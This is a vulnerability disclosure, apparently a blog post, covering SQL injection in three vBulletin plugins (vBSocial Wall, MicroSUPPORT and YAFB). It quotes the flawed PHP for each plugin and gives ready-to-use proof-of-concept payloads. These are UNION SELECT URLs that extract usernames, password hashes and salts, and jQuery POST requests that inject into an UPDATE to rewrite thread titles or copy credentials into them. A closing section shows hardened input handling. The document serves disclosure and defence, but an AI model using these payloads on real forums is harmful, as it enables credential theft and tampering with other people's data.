vBulletin vBSocial.com Wall Plugin – SQL Injection

Plugin: http://www.vbulletin.org/forum/showthread.php?t=294260
Version: <= 2.5 (latest)
The vulnerability resides in the misc_start hook and the /includes/class_statusbit.php file:

	public function process_fetch_status_item($status_id)
	{
		global $vbulletin;
		$status_item = $vbulletin->db->query_first("SELECT * FROM ".TABLE_PREFIX."status WHERE id='$status_id'");
		if ($status_item)
		{
			$status_item['message'] = htmlspecialchars_uni($status_item['message']);
			$status_item['message'] = smartConvertPost($status_item['message']); // parse image links
			$status_item['message'] = parse_youtubelinks($status_item['message']); // parse youtube video links
			$status_item['message'] = nl2br(trim(fetch_censored_text($status_item['message'])));

			if ($status_item['type'] == 'poll'){
				$poll_get = $vbulletin->db->query_read("SELECT * FROM ".TABLE_PREFIX."status_poll WHERE statusid='".$status_item['id']."'");
				if ($vbulletin->db->num_rows($poll_get) > 0){
					$i = 0;
					while ($poll_item = $vbulletin->db->fetch_array($poll_get)){
						$i ++;
						$status_item['message'] .= '
';
					}
				}
			}
			return $status_item['message'];
		}
	}

The status_id value taken from the request is passed to these functions and interpolated straight into the query without being escaped, cast to an integer, or otherwise checked.

Proof of concept:
http://example.com/misc.php?do=ln_fetch_status_item&status_id=11' UNION SELECT null, concat(username, 0x3a, password, 0x3a, salt), null, null, null, null, null, null, null, null, null, null, null FROM user WHERE userid = '1

This will display the username, password and salt of the user with id 1 in the database.

[Image: vBSocial Wall SQL Injection]

vBulletin MicroSUPPORT Plugin – SQL Injection

Plugin: http://www.vbulletin.org/forum/showthread.php?t=254336
Version: <= 4.6.4 (latest)
The vulnerability resides in the microsupport.php file. Not a single variable is sanitized; request values are used directly in the SQL queries throughout the file. An easy way to extract information from the database is by abusing the checkchatcall_request branch of the PHP file, which looks like this:

if ($_REQUEST['requester'] == "checkchatcall_request") {
	$adminsID = $vbulletin->input->clean_gpc('r', 'adminsID', TYPE_STR);
	$chatcheck = $db->query_read("SELECT * FROM ".TABLE_PREFIX."microsupport_supportusers_online WHERE supportuserid=$adminsID");

	while($row = $db->fetch_array($chatcheck)) {
		if($row[usersUID] > 0){
			$usersid = $row[usersUID];
			$output = 'checkchatcall=1&supportuseridrequester='.$usersid;
		}else{
			$output = 'checkchatcall=0';
		}
	}
	echo $output;
}

Proof of concept:
http://example.com/microsupport.php?requester=checkchatcall_request&adminsID=1 UNION SELECT null, concat(1, 0x3a, username, 0x3a, password, 0x3a, salt), null, null, null FROM user where userid = 1

Note that the first field in the concat() call must be a number, since the code checks whether usersUID is greater than 0, and that is the first column in the result.

[Image: microSUPPORT SQL Injection]

vBulletin YAFB – Yay! Another Facebook Bridge Plugin – SQL Injection

Plugin: http://www.vbulletin.org/forum/showthread.php?t=232457
Version: <= 3.3.2 (latest)
The vulnerability resides in the /fbb/facebook.php file, which is included by the /facebook.php file in the root of the forum; see lines 211 to 245 of /fbb/facebook.php. First, note that post_id is defined as TYPE_STR, a string, which makes it possible to send any string we want as long as it is not sanitized. Now take a look at the first and second if statements: if the post_id variable contains an underscore, it is gladly accepted and used in the UPDATE query in the next if statement without being escaped or sanitized.

if ($_REQUEST['do'] == 'update_log') {
	$vbulletin->input->clean_array_gpc('p', array(
		'log_id' => TYPE_UINT,
		'post_id' => TYPE_STR,
		'exception' => TYPE_STR,
		'threadid' => TYPE_UINT,
	));

	if ($vbulletin->GPC['log_id'] > 0) {
		if (strpos($vbulletin->GPC['post_id'],'_') !== false) {
			$log_entry = array(
				'result' => $vbulletin->GPC['post_id'],
			);
		} else {
			$log_entry = array(
				'result' => $vbulletin->GPC['exception'],
				'is_exception' => 1,
			);
		}

		$vbulletin->db->query_write(fetch_query_sql($log_entry,'fbb_log',"WHERE logid = {$vbulletin->GPC['log_id']}"));

		if (empty($log_entry['is_exception'])) {
			if ($vbulletin->GPC['threadid']) {
				//update Facebook PostID for the target thread (which has just been published to Facebook)
				$vbulletin->db->query("
					UPDATE `" . TABLE_PREFIX . "thread`
					SET fbpid = '{$vbulletin->GPC['post_id']}'
					WHERE threadid = " . intval($vbulletin->GPC['threadid']) . "
				");
			}

			($hook = vBulletinHook::fetch_hook('fbb_update_log')) ? eval($hook) : false;
		}
	}

	exit;
}

The post_id variable is not properly sanitized; it is also defined as a string while it should be an integer.

Since the value lands in an UPDATE statement, you are limited in what you can do.
It is, however, very easy to update any column of vBulletin's thread table this way, and you can do it to any thread.

Example POST request:

POST to:	facebook.php
POST data:	do: update_log
		log_id: 1
		exception: somethingrandom
		post_id: 1', title='_SQL Injection
		securitytoken: SECURITYTOKEN

Proof of concept in jQuery:

$.post("facebook.php", {
	do: 'update_log', 
	log_id: 1, 
	threadid: 1, 
	exception: 'something', 
	post_id: "1', title='_SQL Injection", 
	securitytoken: SECURITYTOKEN
	},function(data){
		console.log(data);
});

This will update the title of the thread with id 1 to _SQL Injection.
Note that the underscore is required, since the script checks for an underscore in the variable.

However, we can also extract any data out of any table by doing something like the following:

$.post("facebook.php", {
	do: 'update_log', 
	log_id: 1, 
	threadid: 1, 
	exception: 'something', 
	post_id: "1', title = (SELECT concat(username, 0x3a, password, 0x3a, salt) FROM user WHERE userid = 1), keywords = '_hi", 
	securitytoken: SECURITYTOKEN
	},function(data){
		console.log(data);
});

This will change the title of the thread to the username, password and salt of userid 1.
Now of course you would want to change the title of the thread back to its original state.
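For comparison, a hardened version of the three input paths described above (vBSocial's status_id, MicroSUPPORT's adminsID and YAFB's post_id), added here as an illustration and not taken from any of the plugins. It uses vBulletin's own clean_gpc() with TYPE_UINT and escape_string(); the function names and the assumed digits_underscore_digits shape of a Facebook post id are assumptions.

```php
<?php
// Added example: hardened input handling for the three vulnerable code paths
// above. Function names are assumptions, not the plugins' actual fixes.

// vBSocial Wall: status_id is a row id, so coerce it to an unsigned integer.
// clean_gpc() with TYPE_UINT yields 0 for anything that is not a number, and an
// integer can be interpolated into the query without any quoting tricks.
function fetch_status_item_safe($vbulletin)
{
	$status_id = $vbulletin->input->clean_gpc('r', 'status_id', TYPE_UINT);
	if ($status_id === 0) {
		return false; // no valid id supplied; refuse to query
	}
	return $vbulletin->db->query_first(
		"SELECT * FROM " . TABLE_PREFIX . "status WHERE id = " . intval($status_id)
	);
}

// MicroSUPPORT: adminsID was cleaned as TYPE_STR and used unquoted. The same
// TYPE_UINT coercion removes the injection regardless of quoting.
function check_chat_call_safe($vbulletin, $db)
{
	$adminsID = $vbulletin->input->clean_gpc('r', 'adminsID', TYPE_UINT);
	return $db->query_read(
		"SELECT * FROM " . TABLE_PREFIX . "microsupport_supportusers_online"
		. " WHERE supportuserid = " . intval($adminsID)
	);
}

// YAFB: a Facebook post id is assumed here to be two numbers joined by an
// underscore. Validate that whole shape instead of only checking for an
// underscore, then escape the value before it reaches the UPDATE.
// Returns false when the id is rejected, true when the row was updated.
function update_thread_fbpid_safe($vbulletin, $post_id, $threadid)
{
	if (!preg_match('/^\d+_\d+$/', $post_id)) {
		return false;
	}
	$vbulletin->db->query_write(
		"UPDATE `" . TABLE_PREFIX . "thread`"
		. " SET fbpid = '" . $vbulletin->db->escape_string($post_id) . "'"
		. " WHERE threadid = " . intval($threadid)
	);
	return true;
}
```

Even with the format check in place, escape_string() is kept so that a later change to the accepted format cannot silently reintroduce the injection.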

[Image: YAFB SQL Injection]